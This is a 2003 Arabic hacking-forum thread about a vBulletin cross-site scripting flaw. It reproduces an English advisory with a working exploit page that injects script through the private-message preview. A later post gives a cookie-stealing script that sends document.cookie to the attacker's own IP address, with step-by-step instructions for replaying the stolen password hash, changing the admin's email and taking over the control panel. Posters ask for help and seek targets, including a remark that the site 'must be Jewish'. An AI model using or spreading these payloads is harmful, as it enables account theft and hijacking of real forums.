المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغره جديده في منتديات الvb


Smart c0d3r
16-05-2003, 08:18
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله

الثغرة وضعت في مواقع الحماية واول من كتب عنها الاخ العقرب الاحمر

لكن هذي كانت على النسخة التجريبية Beta

بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك

طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
http://[victim]/forum/private.php

From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln


---------------------------------------
---------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
---------------
Any kind of XSS att
acks possibility.

-----------------------------------------------------
-
About VBulletin;
-----------------------------------------------------
-
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
<a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a>

---------------------------------------
---------------
Vulnerable;
-----------------------------------------------------
-
vBulletin 3.0.0 Beta 2
<
br />vBulletin 2.x
---------------------------------------
---------------

-----------------------------------------------------
-
Vendor Status;
-----------------------------------------------------
-
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;

-----------------------------------------------------
-
Solution;
-----------------------------------------------------
-
HTML Encoding like post&
nbsp;thread preview page;

-----------------------------------------------------
-
Exploit Code;
-----------------------------------------------------
-
<html>
<body>
<form action="http://[victim]/forum/private.php"&nbs
p;method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />

<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post
Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview
Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You
can write your own JS codes
var xss = "\"><script>alert(document.coo
kie)</script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>


*You may need login first


Ferruh Mavituna
Web Application Security
Consultant
Freelance Developer & Designer
<a href="http://ferruh.mavituna.com"
target="_blank">http://ferruh.mavituna.com</a>

ferruh@mavituna.com

الأسير
16-05-2003, 09:17
ممكن تشرح يا حبيبي

hi_HaCkEr
16-05-2003, 09:26
والثغرة وضعت في مواقع الحماية واول من كتب عنها الاخ العقرب الاحمر

لكن هذي كانت على النسخة التجريبية Beta

عموما الف شكر على سبقك وكونك اول من وضعها في منتدانا

تحياتي لك

hi_HaCkEr
16-05-2003, 09:35
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك

طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
http://[victim]/forum/private.php

تحياتي

$سهم$
17-05-2003, 06:21
بصــــــراحه

انا ارى انه وضع الثغرة بطريقة القص واللصق بدون شرح بالعربي مافيه فايده ا كلنا نخش مواقع الامن بس المشكله عندنا شرح الثغرة

يعـني احنا كـذا نكون كمـن فســـــرو الماء بالمــــــاء

ولا انا غلطان :confused:

Smart c0d3r
17-05-2003, 03:50
بس الثغرة جدا واضحة

وأخونا هاي هاكرز ما قصر شرح الي عليه

انشا الله المرة القادمة يكون الشرح أفضل

تحياتي المتمكن

ابو مجاهد
17-05-2003, 05:55
حاولت اطبقها ولقيت منتدى اصدار vBulletin 3.0.0 Beta 2 مفتوح hTML وسجلت ورحت على الصفحة الي سويتها وسميتها vbhack.html وفتحتها لقيت مربعين واحد كبير والثاني صغير مثل الشل ايش اكتب فيها؟؟؟؟؟

hi_HaCkEr
17-05-2003, 07:32
يا شباب الثغرة جديدة وبعدين في الاصدار التجريبي يعني ما منها فايدة

واذا كنتوا مصرين نشوف ونجرب سوا

ياريت يا ابومجاهد تعطيني عنوان الصفحة اشوفها

تحياتي

Smart c0d3r
20-05-2003, 03:32
أشكرك أخي هاس هاكرز على الرد

وننتظر الموقع بس شرط يكون يهودي

تحياتي المتمكن

TaZ HaCkEr
24-05-2003, 09:38
اصبروا

على كذا كل واحد يقول وضح وانا مافهمت

ياكاتب الموضوع وشلون الطريقة

انا رحت لمنتدى نفس الاصدار وكود الهتميل مفتوح

سجلت اوكي

عدلت الكود لصفحة هتميل

بعدين وش اسوي ارسلها رساله خاصه للادمن ولا شلووووووون ارجوا التوضيح

Smart c0d3r
24-05-2003, 01:27
أقولكم الصراحة هذا واحد من زملائي

كتب هذا الموضوع بعد ان استخدم اسمي ولم اعلم بذلك

فقد قال لي اريد ان ارى موضوعا واحد لو سمحت وكتب هذا الموضوع

بالنسبة لفهمي لهذه الثغرة اكيد ترسلها الى الادمن لانها لما يفتحها على طول يوصلك الكلمة السرية

وبعدين تروح للوحة التحكم وتحط اسمه والكلمة الي وصلتك

هذا حسب خبرتي واذا جاء هاي هاكرز انشا الله بيفهمك وانشا الله ما تكون معلوماتي خطأ

تحياتي مع الأسف لزميلي الي كتب الموضوع:confused:

تحياتي المتمكن;)

قبلة الموت
24-05-2003, 08:46
انا نسخت الكود وغيرت المطلوب . وبعد فتحه اعطاني مكان اني اكتب فيه الرسالة؟؟؟؟؟
طيب في خيارين تحت .كل ما اضغط اي واحد منهم يطلع لي لا يمكن عرض هذه الصفحة.

على العلم المنتدي يدعم الـ HTML وهومفتوح ON

Smart c0d3r
26-05-2003, 11:13
تفظلو هذي الثغره افضل

----------
الثغرة :
---------

تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..

قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
<script>document.write('<img
src="http://my_ip_address/'+document.&@#&@#&@#&@#&@#&@#+'">';</script>

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb






ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f
8;%20bbthreadview[54






20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.name.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

------------
الحل
-----------

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وضعت <img> او <Demon> او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .

تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .

AwFuL-X
27-05-2003, 09:28
طيب يالمتمكن واذا ما كان عندي سيرفر اباتشي او سيرفر ثاني وش اسوي ؟؟؟

Smart c0d3r
27-05-2003, 01:12
تقدر تحمل برنامج اباتشي الي يحول الجهاز الى سيرفر

يمكن ينفع ما ادري

على العموم بابحث لك عن حل

تحياتي المتمكن|1|

الهكر بن لادن
28-05-2003, 10:45
:o لأنه موضوع يصدع الراس
وأتمنى أجد له شرح

Smart c0d3r
29-05-2003, 06:59
الشرح موجود

روح لجوجل وابحث عن الشرح

تحياتي المتمكن

الهكر بن لادن
30-05-2003, 12:53
:o موضوع السيرفر مش هيتفع معاي لأن عندي ويندوز ميلينويم

ابو عواد
18-07-2003, 02:23
مشكور اخي الغالي


وربي يخليك